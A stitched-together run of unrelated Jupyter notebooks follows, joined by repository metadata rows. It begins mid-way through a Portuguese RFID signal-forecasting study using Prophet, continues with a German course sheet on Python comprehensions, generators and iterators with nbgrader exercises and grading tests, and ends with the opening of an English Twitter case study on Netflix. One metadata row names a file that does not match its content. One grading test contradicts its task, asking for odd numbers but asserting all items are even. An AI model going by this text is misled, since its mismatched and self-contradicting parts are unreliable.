df_test_show.index = pd.RangeIndex(df_train.shape[0],df_train.shape[0]+df_test.shape[0]) # reseta index
df_train_show['y'] = scaler.inverse_transform(df_train_show[['y']])
df_test_show['y'] = scaler.inverse_transform(df_test_show[['y']])
forecast_show = forecast.copy()
forecast_show['yhat'] = scaler.inverse_transform(forecast_show[['yhat']])
# + [markdown] id="5S8kPCollJyg"
# Por fim, comparou-se o a distribuição dos dados dos valores reais e previstos da série.
# + colab={"base_uri": "https://localhost:8080/", "height": 592} id="WIs2ev6bCz4n" executionInfo={"status": "ok", "timestamp": 1607192157585, "user_tz": 180, "elapsed": 1937, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="761e5fe5-095c-4072-909c-cff071e4f941"
plt.figure(figsize=(25,10))
plt.plot(df_train_show.iloc[35447:,1])
plt.plot(df_test_show.iloc[:200,1])
plt.plot(forecast_show.iloc[df_test_show.index[0]:df_test_show.index[0]+200,-1])
plt.legend(['Train','Test','Prediction'])
plt.show()
# + [markdown] id="e1KtdAwKGelo"
# ##### *Prophet com crescimento logístico, cap de -35 e floor de -40, utilizado de maneira empirica através da observação da distribuição dos dados de VALIDATION*
# + [markdown] id="N0-_DWIznfBz"
# Para o terceiro teste com modelo de crescimento logístico, valores fixos para cap e floor, de maneira empirica, com base na observação da tendência da distribuição dos valores de y(t).<br>
# Para o dataset criado, mantiveram-se as colunas de VALIDATION, TIMESTAMP, MIN e MAX, sendo que eles foram renomeados para y, ds, floor e cap respectivamente.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="tivBxDykGelp" executionInfo={"status": "ok", "timestamp": 1607192174882, "user_tz": 180, "elapsed": 1038, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="bfa5c066-bb64-452f-bde6-76cd08a5d521"
df_Prophet = df_original.drop(['EPC','MEAN','COUNT'], axis=1)
df_Prophet = df_Prophet.rename(columns={'VALIDATION': 'y','TIMESTAMP':'ds','MIN':'floor','MAX':'cap'})
df_Prophet.head()
# + [markdown] id="dwIDHQmrGelr"
# Como haviam inconsistências no index do dataset, reiniciaram-se os valores, deixando assim o incremento contínuo.
# + colab={"base_uri": "https://localhost:8080/", "height": 419} id="WYRS1ErcGelr" executionInfo={"status": "ok", "timestamp": 1607192178267, "user_tz": 180, "elapsed": 998, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="692f41ab-1a34-4bf0-ea2d-e0a2cab1af0d"
df_Prophet.index = pd.RangeIndex(0,df_Prophet.shape[0])
df_Prophet
# + [markdown] id="pBIO9AgAGelr"
# Os valores da coluna ds foram sobrescritos com a série de tempo com incremento de um milissegundo criada.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="KaGcoDLZGelr" executionInfo={"status": "ok", "timestamp": 1607192181689, "user_tz": 180, "elapsed": 1032, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="2f0266c5-70e8-4754-cdea-4d6585e58eed"
df_Prophet['ds'] = time_index
df_Prophet.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 419} id="luJ41Vj-Gels" executionInfo={"status": "ok", "timestamp": 1607192184359, "user_tz": 180, "elapsed": 1066, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="d0fdf0e8-9958-4dc0-efca-d62d1db19c4e"
df_window = df_Prophet.iloc[min_period:max_period,:]
df_window
# + [markdown] id="xzeKTmhNn-z_"
# Para se manter os parâmetros similares entre os modelos LSTM e Prophet, realizou-se a divisão do dataset entre treino e teste com a proporção de 80% e 20%, sem modo shuffle e com semente aleatória 100.
# + colab={"base_uri": "https://localhost:8080/"} id="JUR7hel5Gels" executionInfo={"status": "ok", "timestamp": 1607192189519, "user_tz": 180, "elapsed": 994, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="d300fa41-188a-4ea6-925d-cb7ef5f7e06c"
df_train, df_test = train_test_split(df_window, test_size=0.2, shuffle=False, random_state=100)
print (df_train.shape, df_test.shape)
train_size = df_train.shape[0]
test_size = df_test.shape[0]
# + [markdown] id="ylOWGZWEoDZz"
# Os valores de -35 e -40 foram adotados como cap e floor de maneira empirica, com base na observação na tendência dos valores de y(t).
# + id="iIyieNCXGels" executionInfo={"status": "ok", "timestamp": 1607192193828, "user_tz": 180, "elapsed": 847, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
df_train['cap'] = -35
df_train['floor'] = -40
# + [markdown] id="ZvJcpFD8oRy2"
# Outra prática adotada para que as métricas de avaliação pudessem ser comparadas foi o escalonamento do dataset de treino com valor de 0 a 1 (mínimo e máximo), com escalonador treinado sendo utilizado posteriormente para o dataset de previsão e de teste.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="jogm3WmyGelt" executionInfo={"status": "ok", "timestamp": 1607192198127, "user_tz": 180, "elapsed": 674, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="b27b7f3c-369c-4dd5-830b-d7b5b349697d"
scaler = MinMaxScaler(feature_range=(0, 1))
scaler.fit(df_train[['y']])
df_train['y'] = scaler.transform(df_train[['y']])
df_train.head()
# + [markdown] id="mu5B7L7foUnU"
# Para manter-se a proporcionalidade dos valores, os valores de cap e floor foram escalonados com o escalonador treinado com os valores de VALIDATION do dataset de treino.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="PHEb_mKhGelt" executionInfo={"status": "ok", "timestamp": 1607192201930, "user_tz": 180, "elapsed": 1005, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="17fdfa26-fb21-4981-a481-d3c26f64a1bc"
df_train['cap'] = scaler.transform(df_train[['cap']])
df_train['floor'] = scaler.transform(df_train[['floor']])
df_train.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 470} id="pqX2qVrcGelt" executionInfo={"status": "ok", "timestamp": 1607192247690, "user_tz": 180, "elapsed": 42717, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="8e85bdf9-ea9f-49d8-85af-9a605e1fb76e"
model = Prophet(growth='logistic')
model.fit(df_train)
future = model.make_future_dataframe(periods=test_size, freq='ms')
future['cap'] = df_train['cap'].max()
future['floor'] = df_train['floor'].min()
future
# + id="QeNyeysyGelu" executionInfo={"status": "ok", "timestamp": 1607192275308, "user_tz": 180, "elapsed": 23496, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
forecast = model.predict(future)
# + [markdown] id="f7rYS4cuoZiJ"
# Após a realização da previsão dos dados futuros, gerou-se o gráfico com a apresentação dos resultados e o gráfico com os valores de treino mais a tendência gerada com seu intervalo de incerteza.<br>
# No primeiro gráfico, pode-se observar a **linha sólida vermelha** como a tendência do modelo gerado, os **pontos pretos** distribuidos são os valores do dataset de treino original, as **linhas pontilhadas vermelhas verticais** são os pontos de mudança de tendência identificados e a **faixa azul clara** em torno da tendência são o intervalo de incerteza.<br>
# No segundo gráfico, pode-se observar a linha de tendência gerada pelo modelo e o intervalo de incerteza da previsão futura gerada.
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="TLXo3blGGelu" executionInfo={"status": "ok", "timestamp": 1607192288095, "user_tz": 180, "elapsed": 3146, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="98052e9b-d346-49a5-b3c3-df30d5a1d8ee"
fig = model.plot(forecast,figsize=(25,10))
a = add_changepoints_to_plot(fig.gca(), model, forecast)
fig2 = model.plot_components(forecast,figsize=(25,10))
plt.show()
# + [markdown] id="Qws059sqocoP"
# Para poder se avaliar a métrica da raíz do erro quadrático médio, escalonou-se também o dataset de teste, utilizando o escalonador gerado com o dataset de treino.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="Yj1qKB72Gelv" executionInfo={"status": "ok", "timestamp": 1607192298932, "user_tz": 180, "elapsed": 1368, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="acea9bb2-4995-404a-92c3-d8f6dd9be242"
df_test['y'] = scaler.transform(df_test[['y']])
df_test.head()
# + [markdown] id="CcymyUoAogIY"
# Com base nos valores previstos e os valores reais, calculou-se o valor de RMSE (Raíz do Erro Quadrático Médio).
# + colab={"base_uri": "https://localhost:8080/"} id="Ke7YOvvfGelv" executionInfo={"status": "ok", "timestamp": 1607192323051, "user_tz": 180, "elapsed": 846, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="c0cbd81a-8e06-4e6d-bac8-da5d82dd2c71"
rmse = sqrt(mean_squared_error(df_test.iloc[:,1], forecast.iloc[-df_test.shape[0]:,-1]))
print('RMSE: %f' % rmse)
# + [markdown] id="DzOowscpolGf"
# Por fim, comparou-se o a distribuição dos dados dos valores reais e previstos da série.
# + id="vnFwkud9Gelv" executionInfo={"status": "ok", "timestamp": 1607192329634, "user_tz": 180, "elapsed": 799, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
df_train_show = df_train.copy()
df_train_show.index = pd.RangeIndex(0,df_train.shape[0]) # reseta index
df_test_show = df_test.copy()
df_test_show.index = pd.RangeIndex(df_train.shape[0],df_train.shape[0]+df_test.shape[0]) # reseta index
df_train_show['y'] = scaler.inverse_transform(df_train_show[['y']])
df_test_show['y'] = scaler.inverse_transform(df_test_show[['y']])
forecast_show = forecast.copy()
forecast_show['yhat'] = scaler.inverse_transform(forecast_show[['yhat']])
# + colab={"base_uri": "https://localhost:8080/", "height": 592} id="cSuFNc6iGelv" executionInfo={"status": "ok", "timestamp": 1607192351154, "user_tz": 180, "elapsed": 1404, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="6ca412b3-131b-417b-e483-5068d106d862"
plt.figure(figsize=(25,10))
plt.plot(df_train_show.iloc[35447:,1])
plt.plot(df_test_show.iloc[:200,1])
plt.plot(forecast_show.iloc[df_test_show.index[0]:df_test_show.index[0]+200,-1])
plt.legend(['Train','Test','Prediction'])
plt.show()
# + [markdown] id="AiQ4JPmTpnb9"
# #### Conclusão Prophet
# + [markdown] id="k5IpfnD-Itbb"
# Ao se observar os resultados obtidos com nos quatro cenários apresentados para o Prophet, pode-se observar que todos tiveram uma tendência similar e um valor de raíz do erro quadrático médio próximos.<br>
# O modelo linear apresentou-se bastante vantajoso, devido à sua maneira extremamente fácil de implementar, porém observou-se também que neste caso, houve uma variação muito grande no intervalo de confiança da previsão.<br>
# Dentre todos os cenários apresentados, o que apresentou resultados mais satisfatório foi o cenário de crescimento logístico utilizando como limite de saturação superior (cap) e de limite de saturação inferior (floor) o máximo valor de RSSI medido dentre as tags e o mínimo valor de RSSI medido dentre as tags. Este cenário, apesar de ter demonstrado um valor de raíz do erro quadratico médio ligeiramente inferior ao do cenário com crescimento linerar, apresentou resultado de raíz do erro quadratico médio melhor dentre os três cenários de crescimento logístico e o melhor resultado de intervalo de confiança dos valores previstos dentre todos os cenários avaliados.<br>
# + [markdown] id="MQwoZRxz0WCh"
# # Conclusão
# + [markdown] id="1Cj_iMTyJq79"
# Usar Machine Learning para auxiliar no monitoramento preditivo das leituras das TAGs de RFID em um processo produtivo se demonstrou promissor.
# Em todos os modelos e variações testadas o erro ficou menor que 1db de potência, o que ainda garante um ótima qualidade de validação da TAG no processo produtivo o que resultaria numa TAG válida.
#
# Com os modelos escolhidos não foi possível ser conclusívo na melhor opção ja que ambos tiveram a mesma performance em relação à métrica de treinamento.
#
# Como próximos passos, os testes com outros modelos seria um opção, como por exemplo o ARIMA, também muito famoso e já oferecido comercialmente na empresa que foi fruto desse estudo. Outra meio de explorar ainda mais esse problema é usar outros logs que tenham mais variações em relação aos valores de validação ou um log com mais dados. A dificuldade de conseguí-los seria alta dado a confidencialidade da informação.
#
# Por fim, esse estudo serviu para um grande aprofundamento do assunto e prática das matérias de Machine Learning aprendidas e isso não seria possível se não escolhessemos um dataset real de uma empresa privada.
#
# + [markdown] id="b_wnLxwtKK_3"
# # Referências
# + [markdown] id="B2Ktb3U_HhLf"
# https://machinelearningmastery.com/decompose-time-series-data-trend-seasonality/ <br>
# https://machinelearningmastery.com/how-to-develop-lstm-models-for-time-series-forecasting/ <br>
# https://machinelearningmastery.com/arima-for-time-series-forecasting-with-python/ <br>
# https://machinelearningmastery.com/grid-search-arima-hyperparameters-with-python/ <br>
# https://cocoa.ethz.ch/downloads/2015/02/1795_%5BKTF14a%5D%20Classification%20Models%20for%20RFID-based%20Real%20Time%20Detection.pdf <br>
# https://hal.archives-ouvertes.fr/hal-01744328/file/ertek_chi_zhang_2017_RFID.pdf <br>
# https://arxiv.org/ftp/arxiv/papers/1708/1708.03854.pdf <br>
# https://medium.com/swlh/a-quick-example-of-time-series-forecasting-using-long-short-term-memory-lstm-networks-ddc10dc1467d <br>
# https://machinelearningmastery.com/multivariate-time-series-forecasting-lstms-keras/ <br>
# https://www.vooo.pro/insights/guia-completo-para-criar-time-series-com-codigo-em-python/ <br>
# https://medium.com/data-hackers/s%C3%A9ries-temporais-com-machine-learning-parte-2-75e161b7d78e <br>
# http://www.portalaction.com.br/series-temporais/14-testes-de-estacionariedade <br>
# http://colah.github.io/posts/2015-08-Understanding-LSTMs/ <br>
# http://deeplearningbook.com.br/arquitetura-de-redes-neurais-long-short-term-memory/ <br>
# https://machinelearningmastery.com/multi-step-time-series-forecasting-long-short-term-memory-networks-python/ <br>
# https://facebook.github.io/prophet/docs/non-daily_data.html <br>
# https://facebook.github.io/prophet/docs/trend_changepoints.html <br>
# https://machinelearningmastery.com/time-series-forecasting-with-prophet-in-python/ <br>
# https://facebook.github.io/prophet/docs/quick_start.html#python-api <br>
# https://towardsdatascience.com/forecasting-in-python-with-facebook-prophet-29810eb57e66 <br>
# https://facebook.github.io/prophet/docs/trend_changepoints.html <br>
# https://facebook.github.io/prophet/docs/saturating_forecasts.html <br>
# https://rdrr.io/cran/prophet/man/make_future_dataframe.html <br>
# https://cran.r-project.org/web/packages/prophet/prophet.pdf <br>
# https://towardsdatascience.com/implementing-facebook-prophet-efficiently-c241305405a3 <br>
# https://towardsdatascience.com/forecasting-with-python-and-tableau-dd37a218a1e5 <br>
# https://towardsdatascience.com/forecasting-in-python-with-facebook-prophet-29810eb57e66 <br>
# https://github.com/raffg/prophet_forecasting/blob/master/prophet_airpassengers.ipynb <br>
# https://peerj.com/preprints/3190.pdf <br>
# https://medium.com/@christopher.shayan/experimenting-on-facebook-prophet-eb44818278da <br>
# https://facebook.github.io/prophet/docs/diagnostics.html <br>
# https://towardsdatascience.com/demand-forecasting-using-fb-prophet-e3d1444b9dd8<br>
# https://medium.com/analytics-vidhya/how-does-prophet-work-part-2-c47a6ceac511<br>
# https://medium.com/analytics-vidhya/how-does-prophet-work-44addaab6148<br>
# https://medium.com/analytics-vidhya/how-does-prophet-work-part-2-c47a6ceac511<br>
# http://www.producao.ufrgs.br/arquivos/disciplinas/119_teq6_st_decomposicao.pdf<br>
# http://www.stat.yale.edu/~lc436/papers/Harvey_Peters1990.pdf<br>
#
| 1,573,283 |
/u3/iteratoren.ipynb
|
c7d92da66388b2d3bc391f717e644826bc29225b
|
[
"Apache-2.0"
] |
permissive
|
fh-swf-hgi/skriptsprachen
|
https://github.com/fh-swf-hgi/skriptsprachen
| 0 | 2 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 16,326 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <figure>
# <IMG SRC="https://upload.wikimedia.org/wikipedia/commons/thumb/d/d5/Fachhochschule_Südwestfalen_20xx_logo.svg/320px-Fachhochschule_Südwestfalen_20xx_logo.svg.png" WIDTH=250 ALIGN="right">
# </figure>
#
# # Skriptsprachen
# ### Winterersemester 2022/23
# Prof. Dr. Heiner Giefers
# # Generatoren und Iteratoren
# Iteratoren erlauben es, alle Elemente eines Datenverbundes zu "durchlaufen", ohne Genaueres über die Implementierung der Datenstruktur zu kennen. Innerhalb einer Programmschleife angewendet, generiert der Iterator eines Objektes eine Sequenz von Referenzen. Diese Referenzen können auf Objekte zeigen, die vom Iterator selbst erzeugt werden, oder auch auf Elemente, die in Datenstrukturen innerhalb des Objektes existieren.
#
# Dieses Übungsblatt behandelt mehrere Aspekte des _Iterierens_ in Python. Zuerst schauen wir uns die sogenannten **Comprehensions** an, ein Konstrukt um aus iterierbaren Objekten Container Objekte zu generieren, die selbst wieder iterierbar sind. **Generatoren** sind Funktionen, die Sequenzen von Objekten nach einem bestimmten Schema erzeugen. Die viel-benutzte _range()_-Funktion ist ein Beispiel für eine Generatorfunktion. Im letzten Teil des Übungsblattes geht es darum, wie man eigene **Iteratoren** innerhalb von Klassen definieren und anwenden kann.
# ## Comprehensions
# Im Übungsblatt zum Thema _Funktionen_ haben Sie lambda-Funktionen kennengelernt. Ein Beispiel für die Anwendung von lambda Funktionen war die eine _map_ Funktion `mymap`:
def mymap(l, f):
local_l = []
for e in l: local_l.append(f(e))
return local_l
# Eine solche Funktion kann benutzt werden, um neue Listen-Objekte aus bestehenden iterierbaren Objekten zu generieren.
mymap(range(0,10), lambda x: x**2)
# Da Operationen dieser Art recht häufig benötigt werden, besitzt Python eingebaute Konstrukte um neue iterierbare Objekte zu erzeugen. **List-Comprehensions** etwa erzeugen neue Listen-Objekte nach folgendem Muster:
[x**2 for x in range(0,10)]
satz = ["Mit", "freundlichen", "Grüßen"]
[s[0] for s in satz]
# Die eckigen Klammern deuten an, dass das Ergebnis eine List ist. Innerhalb der Klammern steht ein Iterator-Aufruf, dem vorangestellt ist eine _Zuordnungsvorschrift_ wie Sie sie aus lambda-Funktionen kennen.
# Es ist möglich, die _for_-Schleifen der Iteratoren zu verschachteln. Durch einfaches "Anhängen" einer _for_-Schleife, wird eine innere Schleife erzeugt:
boolean = ['0', '1']
[ "x=%s y=%s z=%s"%(x,y,z) for x in boolean if x!='1' for y in boolean for z in boolean]
# Ferner ist es möglich, das Erzeugen eines neuen Elementes an Bedingungen zu knüpfen. Die Bedingungen werden dabei einfach an die entsprechende Schleife angehängt:
[x*y for x in range(0,10) if x%2==0 for y in range(0,10) if y%2==0 if y>5]
# **Aufgabe 1**
#
# **Benutzen Sie List-Comprehensions um eine Wahrheitstabelle für die XOR-Funktion mit 3 Variablen $x$, $y$ und $z$ zu erzeugen**
# <pre>
# XOR =
# ['x = 0 y = 0 z = 0 xor = 0',
# 'x = 0 y = 0 z = 1 xor = 1',
# .
# .
# .
# .
# .
# 'x = 1 y = 1 z = 1 xor = 1']
# </pre>
# + deletable=false nbgrader={"grade": false, "grade_id": "cell-f602ae40eb54c387", "locked": false, "schema_version": 3, "solution": true, "task": false}
XOR = None
# YOUR CODE HERE
raise NotImplementedError()
XOR
# + deletable=false editable=false nbgrader={"grade": true, "grade_id": "cell-8de2344401e86f75", "locked": true, "points": 1, "schema_version": 3, "solution": false, "task": false}
from io import StringIO
from unittest.mock import patch
from IPython import get_ipython
ipython = get_ipython()
with patch('sys.stdout', new_callable=StringIO) as screen:
ipython.magic('rerun')
assert '):' not in screen.getvalue(), 'Use List-Comprehensions, NOT for blocks, to create the XOR list'
tru = [[int(x) for x in y if x in '01'] for y in XOR]
for t in tru: assert ((t[0] != t[1]) != t[2]) == t[3], f'{t[0]} xor {t[1]} xor {t[2]} is not {t[3]}!'
# -
# ## Generatoren
# Comprehensions erzeugen iterierbare Objekte aus bestehenden iterierbaren Objekten. Es gibt aber auch Funktionen, die iterierbare Objekte erzeugen; diese Funktionen nennt man Generatoren.
#
# Die Besonderheit bei Generator-Funktionen ist die `yield` Anweisung. `yield` verhält sich ähnlich zu der `return`-Anweisung, mit dem Unterschied, das `yield` zwar Rückgabewerte erzeugt, die Generator-Funktion aber nicht terminiert. Springt der Kontrollfluss erneut zu der Generator-Funktion, wird sie im vorherigen Zustand fortgesetzt.
# +
def gruss():
yield "Mit"
yield "freundlichen"
yield "Grüßen"
for wort in gruss(): print(wort, end=' ')
# +
def zahlen_bis(max):
i = 1
while i <= max:
yield i
i += 1
for i in zahlen_bis(20):
print(i, end=' ')
# -
# **Aufgabe 2**
#
# **Entwickeln Sie eine Generator-Funktion, die alle ungeraden Zahlen von `nmin` bis `nmax` mit der Schrittweite `nstep` generiert.**
# + deletable=false nbgrader={"grade": false, "grade_id": "cell-0cc10e66ec3fe468", "locked": false, "schema_version": 3, "solution": true, "task": false}
def ungerade(nmin, nmax, nstep):
# YOUR CODE HERE
raise NotImplementedError()
for i in ungerade(4,200,30):
print(i, end=' ')
# + deletable=false editable=false nbgrader={"grade": true, "grade_id": "cell-5645fba98bcbf8bb", "locked": true, "points": 1, "schema_version": 3, "solution": false, "task": false}
assert '__iter__' in dir(ungerade(1,101,11)), 'The function is not iterable, make sure you use yield!'
for i in ungerade(1,101,11): assert i%2 == 0, 'All items should be even!'
assert len(list(ungerade(1,101,11))) == 5, 'This set has only 5 elements!'
# -
# ## Iteratoren
# Wir haben Iteratoren bereits mehrfach benutzt, bisher aber noch offen gelassen, wie Iteratoren implementiert werden. Instanzen von eingebauten _Container_ Klassen, wie z.B. Listen, Mengen und Dictionaries, können Iteratoren erzeugen. Sie verwenden dazu eine definierte Schnittstelle, die man auch benutzen kann um Objekte von selbst-entwickelten Klassen iterierbar zu machen.
# Dazu muss die Klasse die beiden _Magic Methods_ `__iter__()` und `__next__()` definieren. `__iter__()` initialisiert den Iterator und gibt eine Referenz auf das eigene Objekt zurück. Das eigentliche Iterieren durch die Sequenz geschieht durch die Methode `__next__()`. Immer, wenn sie aufgerufen wird, liefert sie das aktuelle Objekt der Sequenz zurück und speichert den neuen Zustand so, dass bei einem folgenden Aufruf das nächste Element der Sequenz berechnet werden kann. Welche Objekte zurückgegeben werden und wie die Reihenfolge der Sequenz strukturiert ist, definiert der Programmierer.
# Das Ende eines Iterators wird durch das Erzeugen der `StopIteration`-Ausnahme erreicht. Diese Ausnahme erzeugt keinen Fehler im Interpreter, sondern dient als Abbruchkriterium der for-Schleife, die den Iterator aufruft.
# Durch Implementieren der Iterator-Schnittstelle, kann eine Klasse die Funktionalität erhalten, Datensätze innerhalb der Objekte sinnvoll zu durchlaufen, ohne dass der Benutzer die internen Datenstrukturen der Klasse kennen muss. Die Klasse _FifaWm_ im folgenden Beispiel legt in Ihren Objekten ein Tupel-Attribut _sieger_ an, in dem wiederum 2-Tupel der Form (_Jahr_,_Weltmeister_) abgelegt sind. Möchte man eine Liste der Sieger-Länder von einem Objekt der Klasse erhalten, so muss dem Benutzer der Klasse diese Struktur bekannt sein. Durch Implementieren der `__iter__()` und `__next__()` Methoden wird die Klasse iterierbar.
class FifaWm:
def __init__(self):
self.sieger=(
(1930,"Uruguay"),(1934,"Italien"),(1938,"Italien"),(1950,"Uruguay"),
(1954,"Deutschland"),(1958,"Brasilien"),(1962,"Brasilien"),(1966,"England"),
(1970,"Brasilien"),(1974,"Deutschland"),(1978,"Argentinien"),(1982,"Italien"),
(1986,"Argentinien"),(1990,"Deutschland"),(1994,"Brasilien"),(1998,"Frankreich"),
(2002,"Brasilien"),(2006,"Italien"),(2010,"Spanien"),(2014,"Deutschland"))
def __iter__(self):
#print("__iter__() für die Klasse %s aufgerufen" % self.__class__.__name__)
self.curr=0
return self
def __next__(self):
if self.curr<len(self.sieger):
r = self.sieger[self.curr][1]
self.curr += 1
return r
else:
raise StopIteration
s = FifaWm()
for land in s: print("%s, " % land, end='')
# Man erkennt in der Implementierung der Iterator-Funktionen, dass ein Iterator keine vollständige Kopie des Objektes erzeugt, sondern nur Zeiger "innerhalb" des Objektes selbst verwaltet. Man sollte daher vermeiden, ein und dasselbe Objekt in verschiedenen Schleifen zu iterieren, wie etwa in folgendem Beispiel:
matches = set()
s = FifaWm()
for land0 in s:
for land1 in s:
if land0!=land1:
matches.add(("%s-%s" % (land0,land1)))
print(matches)
# Hier sollten ursprünglich Paarung der Sieger-Länder generiert werden; allerdings sieht man, dass das Ergebnis nicht stimmen kann. Das Problem hier ist, dass die innere Schleife den Iterator koplet "konsumiert". D.h., nachdem die Schleife terminiert, ist in dem Objekt die Abbruchbedingung für den Iterator gültig. Es werden daher keine neuen Objekte erzeugt und so terminiert auch die äußere Schleife nach nur einem Schleifendurchlauf.
#
# Besser ist es an dieser Stelle, 2 Iterator-Ojekte zu erzeugen und diese jeweils in der inneren, bzw. der äußeren Schleife zu verwenden:
matches = set()
s0 = FifaWm()
s1 = FifaWm()
for land0 in s0:
for land1 in s1:
if land0!=land1:
matches.add(("%s-%s" % (land0,land1)))
print(matches)
# **Aufgabe 3**
#
# **Schreiben Sie eine Klasse _Potenzieren_ dessen Konstruktor zwei Parameter besitzt und die entsprechenden Argumente als Attribute `Basis` und `MaxExponent` speichert. Die Klasse soll die Iterator-Schnittstelle in der Form implementieren, dass ein Iterator über die Potenzen der Basis `Basis` von 0 bis `MaxExponent` erzeugt wird**
# + deletable=false nbgrader={"grade": false, "grade_id": "cell-aed2418398231485", "locked": false, "schema_version": 3, "solution": true, "task": false}
class Potenzieren:
# YOUR CODE HERE
raise NotImplementedError()
# + deletable=false editable=false nbgrader={"grade": true, "grade_id": "cell-84f5c6b11a59201f", "locked": true, "points": 1, "schema_version": 3, "solution": false, "task": false}
assert '__iter__' in dir(Potenzieren(5,10)), 'The function is not iterable, define iter magic method!'
assert '__next__' in dir(Potenzieren(5,10)), 'The function does not have a next magic method!'
assert len(list(Potenzieren(5,10))) == 11, 'This set has only 11 elements!'
for i, p in enumerate(list(Potenzieren(5,10))): assert p == 5**i, f'element number {i} should be {5**i} not {p}'
# -
p = Potenzieren(7,12)
for p in p: print(p)
| 11,157 |
/PY0101EN/PY0101EN-4-2-WriteFile.ipynb
|
0fa29b2dba3524237368ab8aa27d52635ec22d8a
|
[] |
no_license
|
den19/Python-for-Data-Science-AI-and-Development
|
https://github.com/den19/Python-for-Data-Science-AI-and-Development
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 25,796 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# # Case Study 1 : Data Science in Twitter Data
# **Required Readings:**
# * Chapter 1 and Chapter 9 of the book [Mining the Social Web](http://cdn.oreillystatic.com/oreilly/booksamplers/9781449367619_sampler.pdf)
# * The codes for [Chapter 1](http://bit.ly/1qCtMrr) and [Chapter 9](http://bit.ly/1u7eP33)
# * [TED Talks](https://www.ted.com/talks) for examples of 10 minutes talks.
#
#
# ** NOTE **
# * Please don't forget to save the notebook frequently when working in Jupyter Notebook, otherwise the changes you made can be lost.
#
# *----------------------
# # Problem: pick a data science problem that you plan to solve using Twitter Data
# * The problem should be important and interesting, which has a potential impact in some area.
# * The problem should be solvable using twitter data and data science solutions.
#
# Please briefly describe in the following cell: what problem are you trying to solve? why this problem is important and interesting?
# +
# DS 501
# Case Study 1
# Group6
# Aashish Bagul
# Fangzheng Sun
# Huanhan Liu
# Qian Xu
#As we know, Netflix is still the most powerful TV streaming company but with the development of other companies like HBO.
#Domestically, there’s no doubt the landscape has gotten a lot more competitive for Netflix,the market share of Netflix is under threat.
#In next month, a new TV show produced by Netflix named Iron Fist based on the Marvel Comics character will release, whether this TV show will be successful means a lot to Netflix
#We want to help Netflix figure out how to make this TV show successful and popular by rational advertising
# -
# ## Data Collection: Download Twitter Data using API
